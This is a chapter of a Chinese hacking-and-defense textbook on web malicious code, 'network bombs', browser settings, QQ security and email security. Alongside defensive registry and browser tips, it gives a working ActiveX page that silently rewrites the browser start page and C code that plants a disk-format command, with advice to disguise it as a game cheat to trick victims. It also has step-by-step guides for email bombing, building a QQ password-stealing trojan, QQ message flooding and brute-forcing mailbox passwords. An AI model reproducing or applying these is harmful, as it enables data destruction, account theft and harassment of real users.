第7章 网络攻防

7.1 网页恶意代码防范

在网络快速普及的今天,恶意代码的肆虐,在Internet上不经意地打开一个网站就可能使电脑感染病毒,造成浏览器首页被篡改或破坏等无法预料的严重后果。因此,应增强对恶意代码的认识,以保证个人电脑的安全。

例1 网页恶意代码的攻击原理与方式是怎样的

同解决其他问题一样,要预防和清除网页恶意代码,需要从其根本入手,了解其攻击的原理和方式,进而对症下药,彻底的清除恶意代码的威胁。

小提示

恶意代码是一种具有入侵性和破坏性的程序,通常在用户不知情的情况下安装和运行,一般利用软件漏洞、用户本身或者两者的混合等手段来传播恶意代码。随着IT技术的发展,恶意代码的传播方式也在不断改变和升级。

大部分恶意攻击性的网页都是通过修改用户的注册表,来达到修改网络首页地址、锁定部分功能等攻击目的。然而我们只是浏览网页,它们是怎么瞒过我们修改了注册表呢?这就不得不提微软(Microsoft)公司的ActiveX技术了。该技术被用于网页编制中,使用JavaScript语言就可以很容易地将ActiveX嵌入到Web页面中。目前互联网上已有成千上万的第三方ActiveX控件。

小提示

ActiveX是微软公司提供的一组使用COM使软件部件在网络环境中进行交互的技术集,是Internet应用开发的重要技术之一,广泛应用于Web服务器,以及客户端的各个方面。

随着ActiveX控件的广泛应用,考虑到Web的安全性,也为了在服务器能够与客户端之间建立良好的信任关系,就规定每个在Web上使用的ActiveX控件都需要设置一个“代码签名”,如果要正式发布,就必须向相关机构申请。不过,由于“代码签名”技术的不完善,导致了许多攻击性代码能够顺利破解“代码签名”,从而修改注册表。

这里介绍一个简单的恶意代码供大家学习:

    <html>
    <head>
    <title>网页恶意代码实例</title>
    <body>
    <script>
    document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXcomp onent></APPLET>')
    <!--使用函数调用ActiveX-->
    function f()
    {x1=document.applets[0];
    x1.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
    x1.createInstance();
    xm=x1.GetObject();
    xm.RegWrite('HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page','http://w ww.baidu.com');
    }
    function init(){setTimeout('f()',1000);}
    init();
    </script>
    <h1>恶意代码攻击实验</h1><hr>
    <h2>IE首页已被修改为“http://www.baidu.com”。</h2>
    </body>
    </html>

此段代码可将IE浏览器的首页地址改为“http://www.baidu.com”,它主要是通过修改注册表“HKEY_CURRENT_USER\SOFT WARE\Microsoft\Internet Explorer\Main\Start Page”中的键值来完成的。

例2 利用360安全卫士查杀恶意代码

网页恶意代码会对操作系统和个人信息安全都会造成严重的威胁,应经常对电脑中的恶意代码进行查杀。目前很多安全辅助类软件都提供了这类查杀功能,例如,QQ电脑管家、金山卫士等,下面以QQ电脑管家为例进行介绍。

01  下载并安装QQ电脑管家,启动其主程序,在主界面中单击“清理垃圾”按钮。

02  切换到“清理垃圾”界面,在窗口下方的列表中勾选“清理插件”复选框,单击“开始扫描”按钮。软件开始对系统中的恶意程序进行扫描,用户需耐心等待。

03  扫描结束后会显示扫描结果,如果存在恶意插件,选中这些恶意程序,然后单击“立即清理”按钮。

04  待清理完成后,关闭程序并重新启动电脑即可。

例3 防范网页恶意代码

我们可以使用软件或其他方法对系统中的恶意代码进行查杀。但执行这些操作时,可能电脑已经被恶意代码感染了。要想保证电脑不被恶意代码感染,必须先从防范做起。网页恶意代码的预防主要应该注意以下几个方面。

小提示

可能有些读者对IE浏览器的“Internet选项”对话框中的设置不太熟悉,本书会在后面的学习中为大家作详细的介绍。

例4 解决主页设置锁定的问题

主页设置锁定很可能是因为恶意代码修改了注册表信息,可以通过以下办法来解决。

01  在系统桌面左下角单击“开始”按钮,在弹出的开始菜单的搜索栏中输入“regedit”命令,然后单击“Enter”键。

02  在弹出的“注册表编辑器”窗口中,依次展开“HKEY_CURRE-NT_USER\Software\Microsoft\InternetE xplorer\control Panel”子键,在右侧窗口中右键单击空白处,在弹出的菜单中依次单击“新建→DWORD值”菜单命令。

03  将新建的键值项命名为“HomePage”,对其双击鼠标左键,在弹出的“编辑字符串”对话框中,将“数值数据”文本框内的值改为“0”,然后单击“确定”按钮即可。

7.2 网络炸弹攻防

“网络炸弹”的由来是因为黑客在使用一种大量信息瞬间发送式的攻击后,被攻击主机立即会产生网络阻塞、蓝屏、死机等现象,使被攻击主机无法正常使用。

例1 网络炸弹具有这些危害

“网络炸弹”可以理解为是在特定逻辑条件满足时实施破坏的程序,与病毒相比,炸弹强调破坏作用本身,但炸弹在破坏手段的选择上和病毒的攻击手段没有什么大的区别,因此防范炸弹和病毒具有许多相同的方法。通常情况下,网络炸弹具有以下危害。

随着网络炸弹功能的扩展,操作界面逐步倾向傻瓜化,它的影响也越来越广泛,从电子邮件、聊天工具到服务器都可以进行攻击。

例2 网络炸弹都有那些种类

在个人电脑的程序中,病毒、木马、网络炸弹是常见的几种破坏手段,对电脑系统进行攻击是它们共同的特点,它们的区别主要体现在传播途径和破坏手段不同。如今,网络中最常见的网络炸弹主要有IP炸弹、E-mail炸弹、java炸弹以及硬盘炸弹等。

1.E-mail炸弹

E-mail炸弹是黑客最常用的攻击手段,大多是通过一次性或反复地向目标邮箱发送大量的垃圾邮件,这些邮件具有地址不详、容量庞大、发送时间间隔短等特征,其典型危害就是信箱挤爆、无法正常收信,严重时还可能导致邮件服务器瘫痪。

2.硬盘炸弹

硬盘炸弹是一种影响很恶劣的炸弹,它的目的就是损坏目标计算机中的数据,如连环格式化等。攻击者会将编写好的炸弹程序上传的网上,这样一旦用户访问这些网站,就会运行这些炸弹程序,进而造成严重的后果。例如,有的硬盘炸弹在运行后并不会立即发作,而是会在几天后定时发作,软件本身还加了密、有壳保护,可以使硬盘数据丢失,假0道损坏,硬盘假死,软驱驱动无效等情况。

编写硬盘炸弹非常容易,例如,下面就是使用C语言编写的格式化硬盘的炸弹代码。

    #include<stdio.h>
    Main()
    {
    FILE*fp;
    Charfilename[30]=”c:\\autoexec.bat”,filecontent[100]=”c:\\windows\\command\\format c:/q-/autotest/u”;
    If((fp=fopen(filename,”w”))==NULL)
    Printf(“cannot open filename\n”);
    fputs(filecontent,fp);
    printf(“现在正在扫描你的计算机:\n正在加载外挂:”);
    fclose(fp);
    }

以上代码在VC++6.0和Turbo C 2.0上运行通过,程序中的中文可以自己随意编写。编译通过后,只要吧这个可执行程序加上一个极具诱惑的名字和一个漂亮的图标,欺骗目标用户运行就可以了,例如,把这个程序仿照成一个QQ农场外挂,那么中招的人就会非常多。

3.Java炸弹

Java语言是Sun公司于1995年推出的一种极富创造力的程序设计语言,具有跨平台性。通过Java编写的软件几乎能够在任何计算机或设备上运行。

一些不法分子也使用Java技术攻击其他用户的电脑。例如,使用Java编程语言编写具有破坏功能的网页,用户只要访问这些网页,就会在系统桌面上不断的弹出大量网页浏览器窗口,由于网页浏览器占用系统资源是很可观的,所以这样的现象一旦出现,就会导致系统资源迅速耗尽,进而出现蓝屏、死机等现象。

4.IP炸弹

IP炸弹是最常见的网络炸弹之一,这类炸弹是利用Windows的系统协议漏洞进行攻击的,黑客们只要查到用户的IP地址即可使用专用的“炸弹”进行攻击,被攻击主机通常会出现断线、蓝屏、死机或重新启动等现象。

例3 网络炸弹攻击实例

通过前面的学习我们对网络炸弹有了一定的了解,下面介绍使用亿虎E-mail群发大师制造邮箱炸弹的方法。

01  下载并安装亿虎Email群发大师软件,启动其主程序,在弹出的操作窗口中单击“增加”按钮。

02  在弹出的“选择地址文件”对话框中选中已经制作好的Email邮箱列表文件,然后单击“打开”按钮。

03  在返回的窗口中即可看到添加的列表文件,然后单击“邮件内容”按钮。

04  在打开的对话框中编写邮件内容,编写完成后单击“邮件附件”按钮。

05  在打开的“邮件附件”界面单击“附件增加”按钮。

06  在弹出的对话框中选中要添加的附件,然后单击“打开”按钮。

小提示

单击“查找范围”右侧的下拉按钮,在打开的下拉菜单中可选择文件所在的文件夹,以便快速查找到指定文件。

07  在返回的对话框中可看到添加的附件,然后单击工具栏的“服务器”按钮。

08  在打开的界面中单击“服务器增加”按钮。

09  在打开的对话框中填写发件地址和收件地址,并且设置SMTP服务器,单击“测试”按钮,可查看服务器是否有效,确认无误后单击“确定”按钮。

10  如果检测DNS服务器无效,可单击“测试”按钮右侧的“…”按钮,然后在打开的页面中查找国内域名解析服务器DNS,然后重新设置DNS服务器。

11  在返回的窗口中单击“选项”按钮,在弹出的对话中设置邮件发送的详细信息,然后单击“确定”按钮。

12  在返回的界面中单击“发送控制”按钮,然后在打开的界面中根据实际情况设置需要控制的邮件地址。

13  设置完成后,单击“开始”按钮,即可指定邮箱定时发送邮件了。

例4 防御网络炸弹

防御网络炸弹的方法与防范电脑病毒和木马有很多相似之处,主要有以下几点。

例5 清除网络标题栏被添加的非法信息

如果用户在使用电脑时遇到网络窗口顶端的蓝色标题栏上多出了某网站的广告标题,可以用以下方法解决。

01  在系统桌面左下角单击“开始”按钮,在弹出的开始菜单的搜索栏中输入“regedit”命令,然后单击“Enter”键。

02  打开“注册表编辑器”窗口,依次展开“HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main”子键,在右侧将“Window Title”键值项的名称改为“Window TitleMicrosoft Internet Explorer”,然后按下“Enter”键即可。

7.3 浏览器安全设置

网页浏览器是浏览网页和下载文件时最常用的门户工具,对网页浏览器进行一些安全保护设置,可以在很大程度上防止病毒或黑客攻击。

例1 设置Internet安全级别

在网页浏览器中进行安全级别的设置,可防止用户在上网过程中无意识地打开包含病毒和木马程序的网页,以及下载到带病毒的文件。设置Internet安全级别的具体方法如下。

01  启动网页浏览器,如IE。按下“Alt”键激活菜单栏,单击菜单栏中的“工具”按钮,在弹出的下拉菜单中单击“Internet选项”命令。

02  在弹出的“Internet属性”对话框中切换到“安全”选项卡,单击“Internet”选项,单击“默认级别”按钮,拖动“该区域的安全级别”栏中的滑块,设置需要的安全级别,然后单击“确定”按钮,完成设置。

例2 启动浏览器时不加载任何页面

正常情况下,网页浏览器启动时会打开默认主页或者一个空白页面,如果默认主页被恶意更改,一旦启动网络就可能进入危险的网站,从而给电脑安全带来巨大的威胁,为了避免这种情况的发生,可以设置在启动浏览器时不加载任何页面,具体操作方法如下。

01  启动网页浏览器,按下“Alt”键激活菜单栏,单击菜单栏中的“工具”按钮,在弹出的下拉菜单中单击“Internet选项”命令。

02  在弹出的“Internet属性”对话框的“常规”选项卡中,单击“使用空白页”按钮,然后单击“确定”按钮保存设置即可。

例3 设置隐私级别

设置浏览器的隐私级别也可以在一定程度上防止黑客工具,具体操作如下。

01  启动网页浏览器,按下“Alt”键激活菜单栏,单击菜单栏中的“工具”按钮,在弹出的下拉菜单中单击“Internet选项”命令。

02  在弹出的“Internet属性”对话框中切换到“隐私”选项卡,在打开的界面中根据需要进行相关的设置,然后单击“确定”按钮即可。

例4 禁止更改安全区域设置

当在网页浏览器的“安全”选项卡中设置了安全级别后,若不想让他人随意更改,可以通过修改注册表信息,禁止他人更改安全区域设置,具体操作如下。

01  在系统桌面左下角单击“开始”按钮,在弹出的开始菜单的搜索栏中输入“regedit”命令,然后单击“Enter”键。

02  在弹出的“注册表编辑器”窗口中,依次展开“HKEY_LOCAL_MACHINE\Software\Polics\Microsoft\Windows\CurrentVersion\InternetSettings”子键。

03  将新建的键值项命名为“Security_options_edit”,然后对其双击鼠标左键。

04  在弹出的“编辑字符串”对话框中,在“数值数据”文本框中输入“1”,单击“确定”按钮,完成设置。

例5 过滤弹出广告页面

在用户浏览网页的过程中,常会弹出网站自带的广告窗口,这不但会影响对网页的正常浏览,如果用户不小心点到广告窗口,还可能会进入带有病毒或木马的黑客网站,通过启用阻止弹出广告页面的功能,可以有效避免这一情况。具体操作方法如下。过滤广告页面的操作方法如下。

01  启动网页浏览器,按下“Alt”键激活菜单栏,单击菜单栏中的“工具”按钮,在弹出的下拉菜单中单击“Internet选项”命令。

02  在弹出的“Internet属性”对话框中,单击“安全”选项卡,然后单击“自定义级别”按钮。

03  在弹出的窗口中找到“使用弹出窗口阻止程序”,在其下方选择“启用”单选项,单击“确定”按钮。

04  在返回到“Internet属性”对话框中,再次单击“确定”按钮完成设置。

例6 禁止用户添加或删除安全区域中的站点

在“Internet选项”的“安全”选项卡有一组安全级别设置,这里的安全区域是一组具有相同安全级的网站。本设置用于禁止安全区域的站点管理设置。

如果不启用本设置,则用户可以向“可信站点”区域和“受限站点”区域添加网站,也可以删除其中的网站,还可以修改“本地Intranet区域”的设置。

01  打开注册表编辑器,依次展开到如下子键:[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\]。

02  在右边窗格中新建“DWORD值”,并命名为“Security_zones_map_edit”,将其值修改为“1”(禁用)。

例7 设置“Internet属性”对话框中选项卡的访问权限

“Internet属性”对话框的各个选项卡的设置都非常重要,本设置用于防止随便修改“Internet属性”对话框的各选项卡。操作根键:[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\control Panel\]。

操作的键值项所对应的功能如下表。

例如,将“generaltab(REG_DWORD)”键值项的值设置为“0”,则当打开“internet属性”对话框时,就会看到“常规”选项卡被删除。

例8 打开仿冒网站筛选功能

IE 8.0记以上版本都具有仿冒网站筛选功能。通过该功能,在上网时可以对网站进行检查,避免恶意网站的欺骗。打开仿冒网站筛选功能的具体操作如下。

01  启动网页浏览器,单击工具栏中的“安全”按钮,在弹出的下拉菜单中单击“SmartScreen筛选器”命令。

02  在弹出的对话框中选择“打开SmartScreen筛选器(推荐)”单选项,然后单击“确定”按钮即可。

此外,如果在浏览网页的过程中遇到可疑网站,可以手动对该网站进行检查,具体操作如下。

01  启动网页浏览器,单击工具栏中的“安全”下拉按钮,然后在弹出的下拉菜单中依次单击“SmartScreen筛选器”→“检查此网站”命令。

02  在弹出的“SmartScreen筛选器”对话框中单击“确定”按钮。

03  在弹出的对话框中会显示检查结果,单击“确定”按钮即可。

例9 禁止更改浏览器的主页

修改网页浏览器的默认主页地址是恶意网页常用的一招,即使在“Internet选项”对话框中将主页地址进行修改也无济于事。在日常生活中可以禁止他人更改浏览器主页,以避免不必要的麻烦,具体操作方法如下。

01  在系统桌面单击“开始”按钮,弹出“开始”菜单,在搜索栏中输入“gpedit.msc”命令,然后按下“Enter”键。

02  在弹出的“本地组策略编辑器”窗口中依次展开“用户配置\管理模板\Windows组件\Internet Explorer”目录,在右侧窗口中双击“禁止更改主页设置”策略项。

03  在弹出的“禁用更改主页设置属性”对话框中选择“已启用”单选项,在“主页”文本框中输入默认主页(本例设为www.baidu.com),然后单击“确定”按钮保存设置即可。

例10 禁止IE组件的自动安装

通过修改软件设置可以禁止IE在访问某些网站时自动弹出下载某个组件的消息框,具体方法如下。

01  打开注册表编辑器,依次展开到如下子键:[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]。

02  在右边窗格中新建“DWORD值”,并命名为“NoJITSetup”,将其值修改为“1”(禁用)。

7.4 QQ攻防实战

目前,腾讯QQ是最常用的网络聊天软件。但也是黑客的主要攻击目标,例如盗取QQ号码、骗取用户私密信息等。如今,如何保证QQ聊天的安全成了重中之重。本节将通过QQ攻防实战演练,巩固大家对QQ攻防的认识。

例1 做好QQ的防范策略

通常情况下,用户的QQ都伴随了自己很久,在其中有着很多重要的信息,所以保护QQ显得格外重要。在使用QQ的过程中应注意以下几点。

例2 使用阿拉QQ密码潜伏者

阿拉QQ密码潜伏者是一款功能强大而又操作简单的QQ盗号软件,使用它可以制作一个木马程序,将木马程序捆绑到极具诱惑的软件上,然后将捆绑木马的软件上传的网上或直接发送给其他人,只要他人双击该软件,木马即可自动启动,就可以劫取对方的QQ账号和密码,并将劫取的信息发送到个人邮箱中,使用阿拉QQ密码潜伏者盗取QQ号码和密码的具体操作方法如下。

01  进入个人邮箱(这里以QQ邮箱为例进行介绍),单击邮箱首页的“设置”链接。

02  在打开的页面中切换到“反垃圾”选项卡,然后在“白名单”栏单击“设置邮件地址白名单”链接。

03  在打开页面中输入“test1@test.com”地址,然后单击“添加到白名单”按钮。

04  启动阿拉QQ密码潜伏者程序,在“收信邮箱地址”文本框中输入前面设置的QQ邮箱地址,然后单击“测试邮箱”按钮。

05  如果邮箱可用,程序会发送一份测试成功的邮件到指定邮箱。打开邮箱,即可看到测试成功的邮件信息。

06  返回“阿拉QQ密码潜伏者”软件操作界面,单击“生成木马”按钮。程序会生成一个木马文件,在打开的对话框中可看到木马文件的存储地址。

07  打开木马文件储存目录即可看到木马文件,用户可根据需要将其重命名、更换图标等,然后将其发送给网络其他用户,一旦他人启动这个木马程序,软件就会将账号信息发送到指定的邮箱中。

例3 使用QQ尾巴生成器

QQ尾巴是一种攻击QQ软件的木马程序,中毒之后,QQ会无故向好友发送垃圾消息或木马网址,当好友点击进入这些木马网站后,便可能遭到黑客的攻击。

QQ尾巴的制作非常简单,目前很多黑客软件都提供了制作QQ尾巴的功能,这里以“战争贩子QQ尾巴生成器2010”为例,介绍QQ尾巴的制作方法,具体操作步骤如下。

01  下载并解压“战争贩子QQ尾巴生成器2010”软件,启动其主程序,在“在这里填写QQ尾巴内容”文本框中设置尾巴的内容,然后单击左下角的广告。

02  单击“生成尾巴”按钮,然后程序会自动生成一个QQ尾巴文件,默认为“muma.exe”。

03  打开软件所在的文件夹即可看到生成的QQ尾巴文件“muma.exe”,该文件在他人电脑中启动时即可产生前面设置的QQ尾巴了。

例4 QQ强制聊天

在网上,很多人为了避免骚扰,都会将QQ设置为验证后才能加好友或者是拒绝添加好友,如果你很想和某个QQ聊天,却无法添加好友,就可以使用QQ强制聊天的方法。

强制与目标QQ聊天的方法很简单,先登录QQ,再在浏览器地址栏中输入“http://wpa.qq.com/msgrd?V=1&Uin=20222xxx5(你要强制聊天的QQ号)&Site=&Menu=yes”,然后按下回车键,此时就会建立一个临时对话框,就可以与对方进行聊天了。

除了上述办法,还可以在浏览器地址栏中输入“tencent://message/?uin=你要强制聊天的QQ号码&Sinte=&menu=yes”,也可以建立临时聊天对话框。

例5 QQ炸弹攻防剖析

在网上难免遇到和自己意识形态有所差异的人,用QQ炸弹让其知道我们的厉害,是一种直截了当的解决办法。不过笔者不建议采用非法手段攻击他人,最好还是以理服人。

01  下载并打开“萝卜QQ轰炸机”,用户可以在打开的窗口中输入要重复的文字信息,单击“添加内容”按钮,就把这句话添加到“轰炸内容”文本框中了。用户可根据需要添加多条内容。

02  选择轰炸目标,本例选择“轰炸好友”单选项,并输入轰炸的次数和频率,单击“抓句柄”按钮,在弹出对话框中拖动放大镜“ ”设置句柄。

03  在返回的对话框中单击“设置OK”按钮,然后单击开始轰炸即可。

例6 加密QQ聊天记录

对于在家或固定场所上网的用户来说,QQ的“消息保护模式”是一个不错的选择。选择该方式登录后,即使别人得到了你的聊天记录文件,没有密码也无可奈何。

01  在QQ页面单击左下角的“主菜单”按钮,在弹出的菜单中依次单击“系统设置”→“安全设置”命令。

02  在弹出的“系统设置”对话框中单击“消息记录”选项,在右侧勾选“启用消息记录加密”复选框,然后单击“确定”按钮即可。

例7 设置代理隐藏本地IP地址

在登录QQ的时候,如果直接使用默认设置登录,黑客可以通过查询本地IP地址,进而对电脑进行攻击。对于一些办公场所或个人信息非常重要的人来说,为了避免这种情况的发生,可以设置代理隐藏本地IP地址。

01  在QQ登录窗口单击“设置”按钮,在弹出的对话框中单击“类型”下拉按钮。

02  在弹出的对话框中选择需要设置代理的类型,然后根据实际情况完成其他内容,单击“确定”按钮即可。

例8 文件接收安全设置

利用QQ接收文件时,如果文件中包含病毒或木马程序,可能会导致电脑受到严重的危害,因此,有必要对文件的接收进行安全设置,具体操步骤如下。

01  在QQ窗口中单击左下角的“主菜单”按钮,在弹出的菜单中依次单击“系统设置\安全和隐私”命令。

02  在弹出的“系统设置”对话框中,勾选“安全”页面中的“安全级-中”单选项,然后单击“确定”按钮完成设置。

例9 如何避免键盘记录器记录QQ密码

在腾讯QQ的登录界面提供了软键盘输入功能,我们在实际登录时,可以使用鼠标先单击登录界面中的键盘按钮,然后在打开的软键盘中使用鼠标输入密码信息。

小提示

在输入密码时,故意输错两次,也可以增加黑客通过查看键盘记录破解QQ密码的难度。

例10 通过密码保护找回被盗的QQ号码

在忘记QQ密码或密码被盗后,可以使用密码保护找回被盗的QQ。具体的操作如下。

01  登录QQ安全中心(网站地址:http://aq.qq.com/cn/fndpsw/fndpsw_index),切换到“找回密码”选项卡,根据提示填写需要找回的QQ账号信息,然后单击“下一步”按钮。

02  在打开的页面中选择密保方式,本例单击“验证密保找回密码”按钮。

03  在弹出的“找回密码”对话框中输入设置的问题答案,然后单击“确定”按钮。

04  在打开的页面中根据需要重新设置QQ密码即可。

小提示

对于细心的用户来说,在QQ密码被盗后可通过自己的密保资料找回号码。而对于忘记密保信息的用户,如果记得自己的账号注册信息或QQ好友,可以通过申诉的方式来找回密码。

7.5 E-mail攻防

随着E-mail(电子邮箱)的广泛应用,黑客们的注意力也转移到了电子邮箱上,他们通过各种手段来达到自己的目的,本节将介绍E-mail攻防的相关知识。

例1 常见电子邮箱攻击手段

黑客攻击电子邮箱的手段很多,最常见的就是使用邮件炸弹和破解电子邮箱的账号密码。

1.邮件炸弹

邮件炸弹攻击是各种攻击中最常见的攻击手段,它造成危害的原理是这样的:由于接收邮件信息需要系统来处理,而且邮件的保存也需要一定的空间。所以,因邮件炸弹而导致的巨量邮件会大大加剧网络连接负担、消耗大量的存储空间,甚至溢出文件系统,这将会给Unix、Windows等许多操作系统形成威胁。

除了操作系统有崩溃的危险之外,由于大量垃圾邮件集中涌来,将会占用大量的处理器时间与带宽,造成正常用户的访问速度急剧下降。而对于个人的免费邮箱来说,由于其邮箱容量是有限制的,邮件容量一旦超过限定容量(即邮箱被“撑爆”),系统就会拒绝服务。

2.盗取邮箱密码

盗取邮箱账号和密码也是黑客常用的攻击手段,他们通过盗取他人邮箱,并使用这些邮箱发送诈骗信息。

盗取邮箱密码最常见的方法就是在远程主机上安装键盘记录工具,这些工具能够记录机主一天键入的字符,当然这个字符量可能很大,也可能很小,依主人使用情况而定,键入的字符会形成文本文件,而且密码会和其他的字符有很大不同,所以,黑客可以轻而易举的从这个文件中判断哪一段是密码。现在键盘记录工具很多,例如键盘记录者、全能鼠标键盘记录器等。

例2 使用流光盗取邮箱密码

在前面的学习中介绍过流光扫描器,这里主要介绍使用流光扫描器探测账号和密码的方法。

1.探测邮箱账号和密码

使用流光扫描器可以对邮箱账号和密码进行探测,具体操作步骤如下。

01  下载并安装流光软件,启动其主程序,在其主界面勾选并右键单击“POP3”选项,然后在弹出的菜单中依次单击“编辑”→“添加”菜单命令。

02  在打开的对话框中设置POP 3主机,本例输入“POP3.163.com”,对163邮箱进行探测,然后单击“确定”按钮,可将该主机添加到流光程序中。

03  接下来需要添加破解账号所需的用户列表文件,在添加用户列表文件前可先对其进行编辑。在流光软件的安装目录中找到要进行编辑的扩展名为“.dic”的用户列表文件,然后单击鼠标右键,在打开的菜单中单击“使用记事本打开”命令。

04  在以记事本打开的用户列表文件中,用户可以根据需要添加或删除相应的内容,设置完成后依次单击“文件”→“保存”菜单命令保存文件。

05  返回主界面,右键单击添加的POP3主机,然后在弹出的菜单中依次单击“编辑”→“从列表中添加”菜单名。

06  在弹出的对话框中选中前面修改后的用户列表文件,然后单击“打开”按钮。程序会自动完成添加用户列表,添加结束后,在流光操作界面中可看到添加的文件。

07  在主界面中依次单击“探测”→“简单模式探测”菜单命令,开始探测邮箱账户及密码,探测结束后会弹出探测结果。如果用户列表文件中包含的数据过大,探测过程会非常久。

2.暴力破解邮箱密码

如果知道了用户的电子邮箱账号,就可以使用流光软件对其密码进行暴力破解,具体操作如下。

01  启动流光软件,在主界面中按照前面介绍的方法添加一个POP3主机,如“pop3.163.com”,右键单击该主机,在弹出的菜单中依次单击“编辑”→“添加”菜单命令。

02  在弹出的对话框中输入需要添加的账户名称,单击“确定”按钮,在返回的程序主界面中即可看到添加的账户。

03  对于一些简单的邮箱密码,可以使用流光软件提供的解码字典进行破解,在流光软件界面中右键单击“解码字典或方案”选项,然后在弹出的菜单中依次单击“编辑”→“添加”菜单命令。

04  在打开的对话框中找到并选中“password.Dic”字典文件,然后单击“打开”按钮。

05  在打开的对话框中即可看到添加的字典文件。

06  解码字典添加完成后在流光软件操作界面依次单击“探测”→“标准模式探测”菜单命令。

07  流光软件开始破解指定邮箱账号的密码,此过程根据密码复杂程度的不同所需时间也不尽相同,用户需耐心等待,破解完成后会弹出对话框显示破解结果。

例3 禁止IE记录登录信息

在默认情况下,在浏览器中登录账号(例如论坛账号、邮箱账号以及网页游戏账号等)时,会弹出对话框询问是否保存密码,设置保存后,可以在下一次登录时不必再次输入,但是这也给他人盗取自己的账号带来了方便。

当黑客控制本机后,在浏览器中输入对应的邮箱账号时,浏览器会自动输入密码,这无疑是很不安全的。为避免上述情况的发生,我们可以通过设置来禁止IE记录登录账号和密码,具体操作方法如下。

01  打开IE浏览器,按下“Alt”键,在弹出的菜单栏中依次单击“工具”→“Internet选项”菜单命令。

02  在打开的对话框中切换到“内容”选项卡,在“自动完成”下方单击“设置”按钮。

03  在打开的对话框中取消所有自动完成的选项,然后单击“删除自动完成历史记录”按钮。

04  在打开的对话框中勾选需要删除的自动完成的记录,然后单击“删除”按钮,系统会自动完成记录的删除,然后单击“确定”按钮,保存设置即可。

例4 过滤垃圾邮件

经常使用电子邮件的用户,都可能会遇到垃圾邮件困扰。我们可以通过电子邮箱提供的功能来有效过滤垃圾邮件,这里以网易163邮箱为例进行介绍。

01  登录网易163免费邮箱。在网易163网络免费邮箱首页单击“设置”链接。

02  在弹出的邮箱“设置”设置页面单击“反垃圾设置”栏中的“白名单设置”链接。

03  在弹出的对话框中输入信任邮箱的地址。单击“添加到白名单”按钮。按照上述方法设置完白名单后单击“设置”链接。

04  返回到邮箱“设置”页面,单击“反垃圾级别”链接。根据自己的需要选择不同的反垃圾的级别。设置完成后单击“确定”按钮即可。

例5 设置邮箱密码保护

为了更安全放心的使用邮箱,我们可以通过设置邮箱密码保护来达到目的,下面以新浪邮箱为例进行介绍。

01  登录邮箱,在邮箱首页单击“邮箱设置”链接。

02  在打开的界面中切换到“账户”选项卡界面。

03  在“账户资料”栏中单击对应的链接进行不同形式的密码保护措施,本例单击“设置安全”邮箱链接。

04  在打开的页面中输入当前邮箱账户密码然后单击“提交”按钮继续操作。

小提示

设置安全邮箱就是将该邮箱与另外一个邮箱绑定,这样,在忘记密码时就可以使用绑定的邮箱来找回密码。

05  在接着打开的页面中输入安全邮箱账号,然后单击“提交”按钮继续操作。

06  设置成功后会在打开的页面中提示安全邮箱已经生效,这时单击“关闭”按钮关闭窗口即可。

例6 找回邮箱密码

当用户的邮箱密码忘记或丢失后,可以使用绑定的安全邮件进行找回,具体操作步骤如下。

01  在新浪邮箱登录界面单击“找回密码”链接。

02  在打开的界面中输入需要找回的邮箱账号,然后输入对应的验证码并单击“提交”按钮。

03  在接着打开的页面中选择找回邮箱密码的方式,本例单击“安全邮箱”链接。

04  在打开的页面中输入安全邮箱的账户信息,然后输入验证码并单击“提交”按钮。

05  在打开的页面中会提示系统已经向安全邮箱发送密码找回信息,这里单击“关闭本页”按钮,关闭当前窗口。

06  登录前面设置的安全邮箱,打开密码找回信息的邮件,根据提示单击对应的链接。

07  在接着打开的页面中根据提示重新设置邮箱的密码,然后单击“提交”按钮。

08  密码重置完成后会在打开的页面中提示修改成功,此时单击“关闭本页”按钮,关闭窗口即可。